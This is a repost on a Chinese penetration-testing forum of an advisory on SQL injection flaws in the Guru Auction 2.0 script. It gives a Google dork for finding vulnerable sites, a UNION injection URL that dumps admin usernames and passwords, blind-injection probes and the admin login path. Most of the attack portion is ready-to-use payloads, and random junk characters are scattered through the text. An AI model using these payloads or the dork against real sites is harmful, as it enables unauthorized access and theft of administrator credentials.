中国网络渗透测试联盟

标题: Guru Auction 2.0多重sql注射 [打印本页]

作者: admin    时间: 2012-12-31 09:24
标题: Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities5 g- N. e& H9 O" B) i6 N1 G5 c
! k# J; b; M, @2 z6 z2 e" P/ N
作者     : v3n0m
% I' \# Q! s  o- Z' A5 A; ]应用 : Guru Auction 2.0
5 s3 ^0 e( g( b6 O0 f$ ZPrice       : $49
3 y2 p& V* g' nVendor      : http://www.guruscript.com/6 k9 W) |# C" k" W$ }
Google Dork : inurl:subcat.php?cate_id=
2 V4 X( O7 Y% a
' T% K1 k+ l% q" w$ {* hSQLi p0c:+ [" L, }" p; B, K6 B- v: o, A# ^% A. e
~~~~~~~~~~
$ B% I# |0 B  B" Xhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
. F: i+ C2 H2 o7 e& {9 @9 o4 F- F # y: [$ T# O2 P9 d2 V/ z' Y. E$ z8 q9 }
  ^. u' G9 I4 S6 m; ?3 G: T
盲注 p0c:
  I1 V& q& V! ]' j& Z0 I~~~~~~~~~~
% r7 X& }! M; m4 Zhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
/ y4 \3 J/ Z! V" L1 h6 {* Q0 ahttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
7 k) G7 l. b$ v: _9 g * v! j- z3 _$ L# }- U8 ?! }
管理登录入口:* m6 L" w) r" t6 W& N# D
~~~~~~~~~~/ m( H' t( L6 A3 \9 f
http://domain.tld/[path]/admin/3 o* z2 ^+ c3 u4 m1 i$ ~) o





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2